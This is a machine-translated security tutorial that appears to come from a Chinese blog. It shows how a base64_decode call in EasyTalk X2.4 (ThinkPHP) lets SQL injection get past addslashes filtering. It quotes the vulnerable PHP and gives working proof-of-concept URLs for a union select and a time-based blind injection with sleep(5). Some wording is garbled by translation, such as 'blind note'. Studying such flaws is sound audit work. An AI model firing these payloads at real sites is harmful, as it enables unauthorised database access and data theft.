In those years, we will explore the global protection of SQL injection. Bypass Base64Decode

In those years, we will explore the global protection of SQL injection. Bypass Base64Decode
0x01 background

Currently, WEB programs basically have global filtering for SQL injection, such as enabling GPC in PHP or common in global files. use the addslashes () function on php to filter the received parameters, especially single quotes. In the same article, we need to find some encoding and decoding functions to bypass global protection. This article introduces the situation of base64decode.

0x02 environment setup

Check the background. We use the easytalk program of a lower version. The version is X2.4.
I packed a copy of the source code: http://pan.baidu.com/s/1bopOFNL
② Decompress the package to the easytalk directory of www and follow the prompts to install it step by step. If you encounter any problems, click Baidu or Google. After successful access, visit:

First, let's take a look at the source code structure. The ThinkPHP framework is complicated:

If you are interested, you can study it and continue to look at it. New users can know that ThinkPHP filters the received parameters, and will perform corresponding processing based on whether your server enables GPC:
1. Line 3 of the/ThinkPHP/Extend/Library/ORG/Util/Input. class. php file:

/** + ---------------------------------------------------------- * If magic_quotes_gpc is disabled, this function can escape the string + handler * @ access public + handler * @ param string $ string the string to be processed + handler * @ return string + -------------------------------------------------- -------- */Static public function addSlashes ($ string) {if (! Get_magic_quotes_gpc () {$ string = addslashes ($ string);} return $ string ;}

 

2. Use the global search function of the Seay code audit system to search for a file containing the keyword "base64_decode". It is found that SettingAction. class. php contains a location for base64_decode for the received parameter auth:

3. We followed up on this PHP file and found that although the daddslashes function was used for injection filtering, the base64_decode function was used to transcode the parameter auth so that the injection could be caused by bypassing the filtering:

// Authentication Email public function doauth () {$ _ authmsg = daddslashes ($ _ GET ['auth']); // determine whether GPC is enabled again and perform injection filtering $ authmsg = base64_decode ($ _ authmsg); // The base64_decode function transcodes the parameters $ tem = explode (":", $ authmsg); // separate the decoded parameter authmsg and save it to the array tem by ":" $ send_id = $ tem [0]; $ user = M ('users'); $ row = $ user-> field ('mailadres, auth_email ')-> where ("user_id =' $ send_id '") -> find (); // In the where clause, if ($ _ authmsg = $ row ['auth _ email ']) is injected. {$ user-> wh Ere ("user_id = '$ send_id'")-> setField ('auth _ email ', 1); setcookie ('setok ', json_encode (array ('lang '=> L ('mail6'), 'ico' => 1), 0 ,'/');} else {setcookie ('setok', json_encode (array ('lang '=> L ('mail7'), 'ico' => 2), 0, '/');} header ('location :'. SITE_URL. '/? M = setting & a = mailauth ');}

Construct the POC for obtaining database information:

http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw== 

 

Check whether the SQL statement is successfully executed:

We found that this is a blind note and there is no output, so we use the SQL blind note statement. Obtain whether the first character of the current database user name is 'R' (ascii value: 114) POC:

http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM= 

The page lasts for 5 seconds, indicating that the first character of user () is 'R'. Check that the SQL statement is successfully executed:

Finally, if you are interested, you can write a py script to run this blind note.